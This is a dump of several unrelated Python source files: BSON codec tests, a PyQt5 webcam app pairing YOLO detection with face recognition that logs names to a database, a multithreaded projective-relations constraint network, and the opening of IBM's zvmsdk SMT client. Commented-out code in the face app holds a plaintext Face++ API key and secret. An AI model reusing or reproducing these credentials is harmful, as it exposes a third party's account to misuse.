self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(1, 0))
def test_timestamp_highorder_bits(self):
doc = {"a": Timestamp(0xFFFFFFFF, 0xFFFFFFFF)}
doc_bson = b"\x10\x00\x00\x00" b"\x11a\x00\xff\xff\xff\xff\xff\xff\xff\xff" b"\x00"
self.assertEqual(doc_bson, encode(doc))
self.assertEqual(doc, decode(doc_bson))
def test_bad_id_keys(self):
self.assertRaises(InvalidDocument, encode, {"_id": {"$bad": 123}}, True)
self.assertRaises(
InvalidDocument, encode, {"_id": {"$oid": "52d0b971b3ba219fdeb4170e"}}, True
)
encode({"_id": {"$oid": "52d0b971b3ba219fdeb4170e"}})
def test_bson_encode_thread_safe(self):
def target(i):
for j in range(1000):
my_int = type("MyInt_%s_%s" % (i, j), (int,), {})
bson.encode({"my_int": my_int()})
threads = [ExceptionCatchingThread(target=target, args=(i,)) for i in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
self.assertIsNone(t.exc)
def test_raise_invalid_document(self):
class Wrapper(object):
def __init__(self, val):
self.val = val
def __repr__(self):
return repr(self.val)
self.assertEqual("1", repr(Wrapper(1)))
with self.assertRaisesRegex(
InvalidDocument, "cannot encode object: 1, of type: " + repr(Wrapper)
):
encode({"t": Wrapper(1)})
class TestCodecOptions(unittest.TestCase):
def test_document_class(self):
self.assertRaises(TypeError, CodecOptions, document_class=object)
self.assertIs(SON, CodecOptions(document_class=SON).document_class)
def test_tz_aware(self):
self.assertRaises(TypeError, CodecOptions, tz_aware=1)
self.assertFalse(CodecOptions().tz_aware)
self.assertTrue(CodecOptions(tz_aware=True).tz_aware)
def test_uuid_representation(self):
self.assertRaises(ValueError, CodecOptions, uuid_representation=7)
self.assertRaises(ValueError, CodecOptions, uuid_representation=2)
def test_tzinfo(self):
self.assertRaises(TypeError, CodecOptions, tzinfo="pacific")
tz = FixedOffset(42, "forty-two")
self.assertRaises(ValueError, CodecOptions, tzinfo=tz)
self.assertEqual(tz, CodecOptions(tz_aware=True, tzinfo=tz).tzinfo)
def test_codec_options_repr(self):
r = (
"CodecOptions(document_class=dict, tz_aware=False, "
"uuid_representation=UuidRepresentation.UNSPECIFIED, "
"unicode_decode_error_handler='strict', "
"tzinfo=None, type_registry=TypeRegistry(type_codecs=[], "
"fallback_encoder=None))"
)
self.assertEqual(r, repr(CodecOptions()))
def test_decode_all_defaults(self):
# Test decode_all()'s default document_class is dict and tz_aware is
# False.
doc = {"sub_document": {}, "dt": datetime.datetime.utcnow()}
decoded = bson.decode_all(bson.encode(doc))[0]
self.assertIsInstance(decoded["sub_document"], dict)
self.assertIsNone(decoded["dt"].tzinfo)
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, "cannot encode native uuid"):
bson.decode_all(bson.encode({"uuid": uuid.uuid4()}))
def test_unicode_decode_error_handler(self):
enc = encode({"keystr": "foobar"})
# Test handling of bad key value, bad string value, and both.
invalid_key = enc[:7] + b"\xe9" + enc[8:]
invalid_val = enc[:18] + b"\xe9" + enc[19:]
invalid_both = enc[:7] + b"\xe9" + enc[8:18] + b"\xe9" + enc[19:]
# Ensure that strict mode raises an error.
for invalid in [invalid_key, invalid_val, invalid_both]:
self.assertRaises(
InvalidBSON, decode, invalid, CodecOptions(unicode_decode_error_handler="strict")
)
self.assertRaises(InvalidBSON, decode, invalid, CodecOptions())
self.assertRaises(InvalidBSON, decode, invalid)
# Test all other error handlers.
for handler in ["replace", "backslashreplace", "surrogateescape", "ignore"]:
expected_key = b"ke\xe9str".decode("utf-8", handler)
expected_val = b"fo\xe9bar".decode("utf-8", handler)
doc = decode(invalid_key, CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: "foobar"})
doc = decode(invalid_val, CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {"keystr": expected_val})
doc = decode(invalid_both, CodecOptions(unicode_decode_error_handler=handler))
self.assertEqual(doc, {expected_key: expected_val})
# Test handling bad error mode.
dec = decode(enc, CodecOptions(unicode_decode_error_handler="junk"))
self.assertEqual(dec, {"keystr": "foobar"})
self.assertRaises(
InvalidBSON, decode, invalid_both, CodecOptions(unicode_decode_error_handler="junk")
)
def round_trip_pickle(self, obj, pickled_with_older):
pickled_with_older_obj = pickle.loads(pickled_with_older)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
pkl = pickle.dumps(obj, protocol=protocol)
obj2 = pickle.loads(pkl)
self.assertEqual(obj, obj2)
self.assertEqual(pickled_with_older_obj, obj2)
def test_regex_pickling(self):
reg = Regex(".?")
pickled_with_3 = (
b"\x80\x04\x959\x00\x00\x00\x00\x00\x00\x00\x8c\n"
b"bson.regex\x94\x8c\x05Regex\x94\x93\x94)\x81\x94}"
b"\x94(\x8c\x07pattern\x94\x8c\x02.?\x94\x8c\x05flag"
b"s\x94K\x00ub."
)
self.round_trip_pickle(reg, pickled_with_3)
def test_timestamp_pickling(self):
ts = Timestamp(0, 1)
pickled_with_3 = (
b"\x80\x04\x95Q\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\x0ebson.timestamp\x94\x8c\tTimestamp\x94\x93\x94)"
b"\x81\x94}\x94("
b"\x8c\x10_Timestamp__time\x94K\x00\x8c"
b"\x0f_Timestamp__inc\x94K\x01ub."
)
self.round_trip_pickle(ts, pickled_with_3)
def test_dbref_pickling(self):
dbr = DBRef("foo", 5)
pickled_with_3 = (
b"\x80\x04\x95q\x00\x00\x00\x00\x00\x00\x00\x8c\n"
b"bson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}"
b"\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94"
b"\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database"
b"\x94N\x8c\x0e_DBRef__kwargs\x94}\x94ub."
)
self.round_trip_pickle(dbr, pickled_with_3)
dbr = DBRef("foo", 5, database="db", kwargs1=None)
pickled_with_3 = (
b"\x80\x04\x95\x81\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\nbson.dbref\x94\x8c\x05DBRef\x94\x93\x94)\x81\x94}"
b"\x94(\x8c\x12_DBRef__collection\x94\x8c\x03foo\x94"
b"\x8c\n_DBRef__id\x94K\x05\x8c\x10_DBRef__database"
b"\x94\x8c\x02db\x94\x8c\x0e_DBRef__kwargs\x94}\x94"
b"\x8c\x07kwargs1\x94Nsub."
)
self.round_trip_pickle(dbr, pickled_with_3)
def test_minkey_pickling(self):
mink = MinKey()
pickled_with_3 = (
b"\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\x0cbson.min_key\x94\x8c\x06MinKey\x94\x93\x94)"
b"\x81\x94."
)
self.round_trip_pickle(mink, pickled_with_3)
def test_maxkey_pickling(self):
maxk = MaxKey()
pickled_with_3 = (
b"\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c"
b"\x0cbson.max_key\x94\x8c\x06MaxKey\x94\x93\x94)"
b"\x81\x94."
)
self.round_trip_pickle(maxk, pickled_with_3)
def test_int64_pickling(self):
i64 = Int64(9)
pickled_with_3 = (
b"\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c\n"
b"bson.int64\x94\x8c\x05Int64\x94\x93\x94K\t\x85\x94"
b"\x81\x94."
)
self.round_trip_pickle(i64, pickled_with_3)
def test_bson_encode_decode(self) -> None:
doc = {"_id": ObjectId()}
encoded = bson.encode(doc)
decoded = bson.decode(encoded)
encoded = bson.encode(decoded)
decoded = bson.decode(encoded)
# Documents returned from decode are mutable.
decoded["new_field"] = 1
self.assertTrue(decoded["_id"].generation_time)
if __name__ == "__main__":
unittest.main()
|
hetmet_view_run.py
|
from json import JSONDecoder
import cv2
import time
import threading
import sys
import dialog
from dialog_1 import Ui_Dialog
from PyQt5.QtWidgets import QApplication,QDialog,QLabel
from PyQt5.QtGui import QImage,QPixmap
from PyQt5.QtCore import Qt, pyqtSlot
from PyQt5.QtMultimedia import (QCameraInfo,QCameraImageCapture,
QImageEncoderSettings,QMultimedia,QVideoFrame,QSound,QCamera)
########################################
## Import the recognition libraries
import colorsys
import os
from timeit import default_timer as timer
import numpy as np
from keras import backend as K
from keras.models import load_model
from keras.layers import Input
from PIL import Image, ImageFont, ImageDraw
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import letterbox_image
import os
from keras.utils import multi_gpu_model
from FaceDetect import FaceDetect
import face_recognition
import sqlact
#############################################
# Wrapper around the official Face++ API
result=""
class Dialog(QDialog):
def __init__(self, parent=None):
super().__init__(parent)
self.detector = FaceDetect(0, 'facedata')
self.encoding_list, self.name_list = self.detector.get_name_list()
self._ui = Ui_Dialog()
self._ui.setupUi(self)
# self._ui.lineEdit.setText("路程")
self.camera = None
cameras = QCameraInfo.availableCameras()
if len(cameras) > 0:
self.__initCamera()
self.__initImageCapture()
self.camera.start()
def __initCamera(self):
camInfo = QCameraInfo.defaultCamera()
self.camera = QCamera(camInfo)
self.camera.setViewfinder(self._ui.widget)
self.camera.setCaptureMode(QCamera.CaptureStillImage)
def __initImageCapture(self):
self.capture = QCameraImageCapture(self.camera)
setting = QImageEncoderSettings()
setting.setCodec("image/jpeg")
self.capture.setEncodingSettings(setting)
self.capture.setBufferFormat(QVideoFrame.Format_Jpeg)
self.capture.setCaptureDestination(QCameraImageCapture.CaptureToFile)
self.capture.capture(file="D:/qt5design/wt.jpg")
self.capture.imageCaptured.connect(self.do_imageCaptured)
def accept(self):
pass
def reject(self):
pass
@pyqtSlot()
def on_pushButton_clicked(self):  # start the camera and run recognition
global result
self.camera.stop()
self.camera.searchAndLock()
self.camera.unlock()
face_name =[]
yolo = YOLO()
output_path = ""
vid =cv2.VideoCapture(0,cv2.CAP_DSHOW)
if not vid.isOpened():
raise IOError("Couldn't open webcam or video")
video_FourCC = int(vid.get(cv2.CAP_PROP_FOURCC))
video_fps = vid.get(cv2.CAP_PROP_FPS)
video_size = (int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))
isOutput = True if output_path != "" else False
if isOutput:
print("!!! TYPE:", type(output_path), type(video_FourCC), type(video_fps), type(video_size))
out = cv2.VideoWriter(output_path, video_FourCC, video_fps, video_size)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
return_value, frame = vid.read()
image = Image.fromarray(frame)
image = yolo.detect_image(image)
result_1 = np.asarray(image)
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
cv2.putText(result_1, text=fps, org=(3, 15), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.50, color=(255, 0, 0), thickness=2)
test_locations = face_recognition.face_locations(result_1)
test_encodings = face_recognition.face_encodings(result_1, test_locations)
for face_encoding in test_encodings:
face_distances = face_recognition.face_distance(self.encoding_list, face_encoding)
best_index = np.argmin(face_distances)
if face_distances[best_index] <= 0.55:
re_name = sqlact.search_by_path("face", self.name_list[best_index])
if yolo.label == "person":
sqlact.update_one_sql("face", self.name_list[best_index])
face_name.append(re_name[0][1])
else:
face_name.append("unknown")
for i, (top, right, bottom, left) in enumerate(test_locations):
name = face_name[i]
cv2.putText(result_1, name, (left + 6, bottom + 15), cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 255, 255), 1)
cv2.imshow("FaceRecognition", result_1)
# cv2.namedWindow("result", cv2.WINDOW_NORMAL)
# cv2.imshow("result", result_1)
# show_2 = cv2.resize(result_1, (521, 481))
# show_3 = cv2.cvtColor(show_2, cv2.COLOR_BGR2RGB)
# detect_image = QImage(show_3.data, show_3.shape[1], show_3.shape[0], QImage.Format_RGB888)
# self._ui.widget(QPixmap.fromImage(detect_image))
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyWindow("FaceRecognition")
vid.release()
break
yolo.close_session()
time.sleep(2)
view = sqlact.search_all_sql()
re = [str(t) for i in view for t in i]
li = ""
for i in range(len(re)):
if i % 2 == 0 and i != 0:
li += "\n"
li += re[i] + " "
result = li
self._ui.lineEdit.setText(result)
def on_pushButton_2_clicked(self):  # go back
self.camera.stop()
self.close()
def do_imageCaptured(self,imageID,preview):
pass
def lineeditset(self):
self._ui.lineEdit.setText(result)
###################################################
# YOLO object needed for the camera-based detection
class YOLO(object):
_defaults = {
"model_path": 'trained_weights_stage_1.h5',
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": 'model_data/voc_classes.txt',
"score" : 0.3,
"iou" : 0.45,
"model_image_size" : (416, 416),
"gpu_num" : 1,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
self.__dict__.update(self._defaults) # set up default values
self.__dict__.update(kwargs) # and update with user overrides
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.sess = K.get_session()
self.boxes, self.scores, self.classes = self.generate()
self.label =""
def _get_class(self):
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(self.anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# Load model, or construct model and load weights.
num_anchors = len(self.anchors)
num_classes = len(self.class_names)
is_tiny_version = num_anchors==6 # default setting
try:
self.yolo_model = load_model(model_path, compile=False)
except:
self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
else:
assert self.yolo_model.layers[-1].output_shape[-1] == \
num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
'Mismatch between model and given anchor and class sizes'
print('{} model, anchors, and classes loaded.'.format(model_path))
# Generate colors for drawing bounding boxes.
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
np.random.seed(10101) # Fixed seed for consistent colors across runs.
np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.
np.random.seed(None) # Reset seed to default.
# Generate output tensor targets for filtered bounding boxes.
self.input_image_shape = K.placeholder(shape=(2, ))
if self.gpu_num>=2:
self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)
boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
start = timer()
if self.model_image_size != (None, None):
assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'
assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'
boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))
else:
new_image_size = (image.width - (image.width % 32),
image.height - (image.height % 32))
boxed_image = letterbox_image(image, new_image_size)
image_data = np.array(boxed_image, dtype='float32')
print(image_data.shape)
image_data /= 255.
image_data = np.expand_dims(image_data, 0) # Add batch dimension.
out_boxes, out_scores, out_classes = self.sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.yolo_model.input: image_data,
self.input_image_shape: [image.size[1], image.size[0]],
K.learning_phase(): 0
})
print('Found {} boxes for {}'.format(len(out_boxes), 'img'))
font = ImageFont.truetype(font='font/FiraMono-Medium.otf',
size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))
thickness = (image.size[0] + image.size[1]) // 300
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = self.class_names[c]
box = out_boxes[i]
score = out_scores[i]
label = '{} {:.2f}'.format(predicted_class, score)
self.label = predicted_class
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
print(label, (left, top), (right, bottom))  # final label and box coordinates
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
# My kingdom for a good redistributable image drawing library.
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[c])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
del draw
end = timer()
print('time:', end - start)
return image
def close_session(self):
self.sess.close()
############################################################
# def compareIm(faceId1, faceId2):
# # Pass two local image paths, e.g. "D:/Downloads/wt.jpg"
# try:
# # The official API endpoint
# compare_url = "https://api-cn.faceplusplus.com/facepp/v3/compare"
# # The key and secret assigned to the application
# key = "MGS1NV6UEoPTxvoSTJYv8zsKv6an3cPl"
# secret = "qAddmxSmzW_9rm8dCDsp0bVmAtrAV0Y8"
# # Build the request data
# data = {"api_key": key, "api_secret": secret}
# files = {"image_file1": open(faceId1, "rb"), "image_file2": open(faceId2, "rb")}
# # Send the request to the API
# response = requests.post(compare_url, data=data, files=files)
#
# req_con = response.content.decode('utf-8')
# req_dict = JSONDecoder().decode(req_con)
# # print(req_dict)
# # Get the confidence value from the JSON response, i.e. the similarity
# confindence = req_dict['confidence']
# if confindence > 75:
# print("Image similarity:", confindence)
# # confindence is the similarity score
# return confindence
# except Exception:
# pass
# # print("Unable to recognize!")
#
#
# # Repeatedly call the Face++ recognition API and judge the face by the returned similarity
# def sbdg(i):
# for k in range(1):
# try:
# if compareIm(imgdict[i],"D:/qt5design/wt.jpg") > 75:
# print("Identity confirmed as:", i)
# global result
# result=str(i)
# except Exception:
# pass
#
# #
# #
# imgdict = {"路程": "D:/python文件夹/pycharm_project/untitled2/untitled2/face_data/LuCheng.jpg","刘翔": "D:/python文件夹/pycharm_project/untitled2/untitled2/face_data/LuCheng.jpg","王自如": "D:/python文件夹/pycharm_project/untitled2/untitled2/face_data/LuCheng.jpg"}
# #
# # # Start the camera
# # cap = cv2.VideoCapture(0)
# # # Start the camera capture thread
# # threading.Thread(target=getimg).start()
# # # Create one thread per match target to reduce waiting latency
# def RUN():
# for x in imgdict:
# threading.Thread(target=sbdg, args=(x,)).start()
if __name__ == "__main__":
app = QApplication(sys.argv)
myDialog = Dialog()
myDialog.show()
sys.exit(app.exec_())
|
MultithreadedTernaryProjectiveRelations.py
|
import itertools
from collections import defaultdict
from Model.Relations import *
from Model.Relations import _Operations
import time
import threading
'''
def Constraints(re1, re2):
comp = set()
for r1 in re1:
for r2 in re2:
comp = comp.union(_Operations.composition(r1,r2))
return comp
def conv(R):
convR = set()
for r in R:
convR.add(r.converse())
return convR
def rot(R):
rotR = set()
for r in R:
rotR.add(r.rotate())
return rotR
'''
lock = threading.Lock()
class ConstraintNetwork:
def __init__(self, triplets=None):
# Use None as the default to avoid sharing one mutable dict across instances.
self.triplets = triplets if triplets is not None else {}
self.visited = {}
for key in self.triplets.keys():
self.visited[key]=False
def setrel(self, R1, R2, R3, rel):
#if the triplet is already in the dictionary in any of its permutations,
#it removes the entry and stores the new relation
permutations = tuple(itertools.permutations((R1,R2,R3)))
for triplet in permutations:
if triplet in self.triplets.keys():
del self.triplets[triplet]
del self.visited[triplet]
self.triplets[R1, R2, R3] = rel
self.visited[R1, R2, R3] = False
def setvisitedfalse(self):
for key in self.triplets.keys():
self.visited[key]=False
def OperatorTable(self,i):
array_op=[lambda x: x, lambda x: ProjectiveRelation.converse(x), \
lambda x: ProjectiveRelation.rotate(ProjectiveRelation.converse(x)), \
lambda x: ProjectiveRelation.rotate(x), \
lambda x: ProjectiveRelation.converse(ProjectiveRelation.rotate(ProjectiveRelation.converse(x))), \
lambda x: ProjectiveRelation.converse(ProjectiveRelation.rotate(x))]
return array_op[i]
def getrel(self, R1, R2, R3):
permutations = tuple(itertools.permutations((R1, R2, R3)))
for i in range(len(permutations)):
triplet=permutations[i]
if triplet in self.triplets.keys():
r=self.triplets[triplet] #it finds the relation stored in the dictionary
OP=self.OperatorTable(i)
r1=OP(r) #based on the permutation, we need to apply the necessary operators to find the relation that holds for R1,R2,R3
return r1
return U  # no permutation of the triplet is stored, so return the default relation U
def nodes(self):
keys = self.triplets.keys()
nodes = set()
for (a, b, c) in keys:
nodes.add(a)
nodes.add(b)
nodes.add(c)
return nodes
def adjtrip(self, R1, R2, R3):
'''
It finds triplets of regions in the current network having two regions in common with triplet (R1,R2,R3)
It only works with tuples in the given order, that is, it doesn't check for permutations
It returns a set of tuples
'''
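# Illustrative sketch (not from the original source; region names are assumed):
# with stored, unvisited triplets ('A','B','C') and ('B','C','D'),
# adjtrip('A','B','C') returns {('B','C','D')}, since that key shares the two
# regions B and C with the queried triplet.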
#print("calculating adjacent triplets to ", (R1,R2,R3))
keys = [key for key in self.triplets.keys() if self.visited[key]==False]
#print("the candidate keys for which visited==False are: ")
#print(keys)
adjtrip = set()
subset1 = set()
subset2 = set()
subset3 = set()
set1 = set()
set1.add((R1, R2, R3))
subset1.update([R1, R2])
subset2.update([R1, R3])
subset3.update([R2, R3])
for (a, b, c) in keys:
set0=set()
set0.update([a, b, c])
if subset1.issubset(set0) or subset2.issubset(set0) or subset3.issubset(set0):
adjtrip.add((a, b, c))
adjtrip = adjtrip - set1 #this set difference removes the triplet (R1,R2,R3) from the result
return adjtrip
def regions_in_common(self,regions, triplet):
# the two given triplets must have two elements in common
# the function returns a tuple (RA,RB,RC,RD) where RD is the region not in common in (R1,R2,R3),
# RB and RC are the regions in common,
# and RA is the region not in common in <triplet>
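# Worked example (illustrative, assumed region names): for
# regions=('A','B','C') and triplet=('B','C','D'), R1='A' is not in the
# triplet, so (RB, RC, RD) = ('B', 'C', 'A') and RA = 'D', i.e. the result
# is ('D', 'B', 'C', 'A').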
(RA, RB, RC, RD) = (None, None, None, None)
(R1, R2, R3)=regions
abcset=set()
abcset.update(triplet)
if R1 not in triplet:
(RB, RC, RD)=(R2, R3, R1)
abcset.remove(R2)
abcset.remove(R3)
if R2 not in triplet:
(RB, RC, RD) = (R3, R1, R2)
abcset.remove(R1)
abcset.remove(R3)
if R3 not in triplet:
(RB, RC, RD) = (R1, R2, R3)
abcset.remove(R1)
abcset.remove(R2)
RA = abcset.pop()
return (RA, RB, RC, RD)
def calculate(self,triplet,R1,R2,R3,queue,C):
#(R1,R2,R3) is the triplet extracted from the queue
# <triplet> is one of the adjacent triplets to (R1,R2,R3)
C.visited[triplet] = True
# we need to find the regions that are in common with function regions_in_common:
# where RD is the region not in common in (R1,R2,R3), RB and RC are the regions in common,
# and RA is the region not in common in <triplet>
(RA,RB,RC,RD)=self.regions_in_common((R1,R2,R3),triplet)
# the two new triplets to be added to the network are (RA,RC,RD) and (RA,RB,RD)
t1=(RA, RC, RD)
t2=(RA, RB, RD)
# getrel must take into account permutations
# compositions to be calculated are RA,RB,RC + RB,RC,RD = RA,RC,RD
# and RA,RC,RB + RC,RB,RD = RA,RB,RD
r1=C.getrel(RA, RB, RC)
r2=C.getrel(RB, RC, RD)
newr1 = r1.composition(r2)
r3=C.getrel(RA, RC, RB)
r4=C.getrel(RC, RB, RD)
newr2 = r3.composition(r4)
#print(r3)
#print(r4)
oldr1 = C.getrel(RA, RC, RD)
oldr2 = C.getrel(RA, RB, RD)
inters1 = oldr1.intersection(newr1)
inters2 = oldr2.intersection(newr2)
with lock:
if inters1 != oldr1:
C.setrel(RA, RC, RD, inters1)
C.visited[RA, RC, RD] = True
queue.append(t1)
if inters2 != oldr2:
C.setrel(RA, RB, RD, inters2)
C.visited[RA, RB, RD] = True
queue.append(t2)
# print("processing adjacent triplet ", triplet, " to ", (R1,R2,R3))
# print("two new relations are added")
# print("now constraint network is :")
# print(C)
def addrel(self, R1, R2, R3, rel):
C = self
queue = []
queue.append((R1, R2, R3))
#print("appended relation to queue...")
#print("queue contains now ", queue)
r = C.getrel(R1, R2, R3)
#print("retrieved relation ",r)
inters=r.intersection(rel)
#print("made intersection, result is ", inters)
C.setrel(R1, R2, R3, inters)
C.visited[R1, R2, R3] = True
# print("set relation")
# print("now constraint network is :")
# print(C)
while queue != []:
# adjtrip finds triplets with two regions in common with (R1,R2,R3)
(R1, R2, R3) = queue.pop(0)
#print("now extracted from queue relation ", (R1,R2,R3))
adjtrip = C.adjtrip(R1, R2, R3)
#print("now finding adjacent triplets. They are:")
#print(adjtrip)
threads= []
for triplet in adjtrip:
t = threading.Thread(target=self.calculate,args=(triplet,R1,R2,R3,queue,C,))
threads.append(t)
t.start()
for thread in threads:
thread.join()
#when queue is empty the network is set back all to visited = False
C.setvisitedfalse()
def __str__(self):
s = ''
for arc in self.triplets:
s = s + str(arc) + ': ' + str(self.triplets[arc]) + '\n'
return s
if __name__ == '__main__':
print("Starting timer...")
start = time.time()
C = ConstraintNetwork()
print("start. Adding first relation to C...")
C.addrel('A', 'B', 'C','bf')
print("done. Now adding second relation to C...")
C.addrel('B', 'C', 'D','rs')
print("done! Now adding third relation to C...")
C.addrel('C', 'D', 'E', 'ls')
end = time.time()
print("done! Now trying to print out C")
print(C)
print("ELAPSED TIME: ", end - start)
# further work: find a topological interpretation with intervals
'''
C.setrel('s','l',{'o','m'})
C.setrel('s','r',{'<','m','mi','>'})
R=Constraints(C.getrel('l','s'),C.getrel('s','r'))
C.setrel('l','r',R)
newarc={'o','s','d'}
inters=C.getrel('l','r').intersection(newarc)
C.setrel('l','r',inters)
newarc=Constraints(C.getrel('s','l'),C.getrel('l','r'))
inters=C.getrel('s','r').intersection(newarc)
C.setrel('s','r',inters)
#print(C)
'''
|
smtclient.py
|
# Copyright 2017,2021 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import math
# On SLES12, we found that if you import urllib.parse later
# than requests, you will get an error like 'not able to load
# urllib.parse'; this is because urllib will already be in
# sys.modules when requests is first imported.
# As a workaround here, we first import urllib and then import requests.
# Later, we should consider using urllib.request to replace
# requests, if possible, to avoid this kind of issue.
from io import IOBase
import shutil
import six.moves.urllib.parse as urlparse
import requests
import threading
import os
import re
import six
import string
import subprocess
import tempfile
import time
from smtLayer import smt
from zvmsdk import config
from zvmsdk import constants as const
from zvmsdk import database
from zvmsdk import exception
from zvmsdk import log
from zvmsdk import returncode
from zvmsdk import utils as zvmutils
CONF = config.CONF
LOG = log.LOG
_LOCK = threading.Lock()
CHUNKSIZE = 4096
_SMT_CLIENT = None
def get_smtclient():
global _SMT_CLIENT
if _SMT_CLIENT is None:
try:
_SMT_CLIENT = zvmutils.import_object(
'zvmsdk.smtclient.SMTClient')
except ImportError:
LOG.error("Unable to get smtclient")
raise ImportError
return _SMT_CLIENT
class SMTClient(object):
def __init__(self):
self._smt = smt.SMT()
self._pathutils = zvmutils.PathUtils()
self._NetDbOperator = database.NetworkDbOperator()
self._GuestDbOperator = database.GuestDbOperator()
self._ImageDbOperator = database.ImageDbOperator()
def _request(self, requestData):
try:
results = self._smt.request(requestData)
except Exception as err:
LOG.error('SMT internal parse encounter error')
raise exception.SDKInternalError(msg=err, modID='smt')
def _is_smt_internal_error(results):
internal_error_list = returncode.SMT_INTERNAL_ERROR
for error in internal_error_list:
if results['overallRC'] != error[0]:
# overallRC does not match, continue next
continue
if error[1] is not None and results['rc'] != error[1]:
# rc match failed
continue
if error[2] is not None and results['rs'] not in error[2]:
# rs match failed
continue
# All match finish successfully, return true
return True
return False
if results['overallRC'] != 0:
results.pop('logEntries')
# Check whether this smt error belongs to internal error, if so,
# raise internal error, otherwise raise clientrequestfailed error
if _is_smt_internal_error(results):
msg = "SMT internal error. Results: %s" % str(results)
LOG.error(msg)
raise exception.SDKInternalError(msg=msg,
modID='smt',
results=results)
else:
msg = ("SMT request failed. RequestData: '%s', Results: '%s'"
% (requestData, str(results)))
raise exception.SDKSMTRequestFailed(results, msg)
return results
def get_guest_temp_path(self, userid):
return self._pathutils.get_guest_temp_path(userid)
def get_guest_path(self, userid):
return self._pathutils.get_guest_path(userid)
def clean_temp_folder(self, tmp_folder):
return self._pathutils.clean_temp_folder(tmp_folder)
def _generate_vdev(self, base, offset):
"""Generate virtual device number based on base vdev
:param base: base virtual device number, string of 4 bit hex.
:param offset: offset to base, integer.
"""
vdev = hex(int(base, 16) + offset)[2:]
return vdev.rjust(4, '0')
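# Example (illustrative, assumed values): _generate_vdev('0100', 3) computes
# hex(0x0100 + 3) -> '103' and left-pads it to the 4-digit vdev '0103'.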
def _generate_increasing_nic_id(self, nic_id):
"""Generate increasing nic id string
:param nic_id: hexadecimal nic id like '1000'
:return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002'
"""
nic_id = str(hex(int(nic_id, 16)))[2:]
nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:]
nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:]
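# Example (illustrative, assumed value): nic_id '1009' yields the consecutive
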